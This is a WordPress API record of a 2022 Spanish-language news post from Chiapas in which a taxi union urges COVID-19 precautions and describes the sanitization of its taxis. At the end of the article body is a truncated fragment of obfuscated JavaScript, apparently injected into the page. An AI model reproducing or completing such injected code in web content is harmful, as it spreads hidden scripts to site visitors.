{"id":3861,"date":"2022-07-25T02:27:22","date_gmt":"2022-07-25T02:27:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3861"},"modified":"2022-07-25T02:27:23","modified_gmt":"2022-07-25T02:27:23","slug":"recomiendan-no-bajar-la-guardia-ante-quinta-ola-covid-19","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3861","title":{"rendered":"Recomiendan no bajar la guardia ante quinta ola Covid-19"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0021-768x1024.jpg\" alt=\"\" class=\"wp-image-3862\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0021-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0021-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0021.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. Agencia ReporteCiudadano, 24 de julio de 2022. Tuxtla Guti\u00e9rrez.- Taxistas adheridos al Sindicato de taxistas Carlos de Jes\u00fas Natar\u00e9n C\u00f3rdova exhortaron a la poblaci\u00f3n a evitar riesgos a la poblaci\u00f3n en esta quinta ola de Covid-19 y por ello piden no bajar la guardia en los lugares de uso com\u00fan. Margarita Astrid D\u00edaz Estudillo, representante del Sindicato hizo un llamado a sus compa\u00f1eros transportista y a la misma poblaci\u00f3n a no bajar la guardia en cuanto a las medidas sanitarias, sobre todo ahora que existe un repunte de casos Covid-19. La representante del sector dio a conocer que desde el pasado 7 de marzo del 2021 los transportistas agremiados han llevado a cabo los procesos de sanitizaci\u00f3n de las unidades agremiadas, como una medida de protecci\u00f3n a la poblaci\u00f3n por el tema de la pandemia del covid-19, con el apoyo de las dependencias sanitarias que instalaron estos centros de desinfecci\u00f3n.\u201cAl paso del tiempo, este proceso es r\u00e1pido y gratuito, por lo que cualquier unidad puede pasar los fines de semana en un horario de nueve de la ma\u00f1ana a dos de la tarde.  son 128 unidades del sindicato las que semana a semana desde hace m\u00e1s de un a\u00f1o han sido llevadas a desinfecci\u00f3n para la protecci\u00f3n de conductores y ocupantes\u201d, destac\u00f3 la representante de los taxistas de la capital chiapaneca. Reconoci\u00f3 que los transportistas a lo largo de estos 16 meses han tenido que adaptarse a todos los procesos que han pasado durante la pandemia.Recomend\u00f3 a la poblaci\u00f3n usar unidades que est\u00e9n debidamente sanitizadas, \u201clas unidades que guardan los protocolos tienen una calca con la leyenda Taxi Sanitizado. Al menos las unidades del sindicato se identifican con tres franjas con el color de la bandera al frente\u201d.En los primeros meses tuvieron que afrontar el hecho que la poblaci\u00f3n no sal\u00eda de sus hogares, \u201calgo que debemos entender es que la contingencia sanitaria no ha terminado\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 24 de julio de 2022. Tuxtla Guti\u00e9rrez.- Taxistas adheridos al Sindicato de taxistas Carlos de Jes\u00fas Natar\u00e9n C\u00f3rdova exhortaron a la poblaci\u00f3n a evitar riesgos a la poblaci\u00f3n en esta quinta ola de Covid-19 y por ello piden no bajar la guardia en los lugares de uso com\u00fan. Margarita Astrid D\u00edaz &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3862,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3861","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3861"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3861\/revisions"}],"predecessor-version":[{"id":3863,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3861\/revisions\/3863"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3862"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3861"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}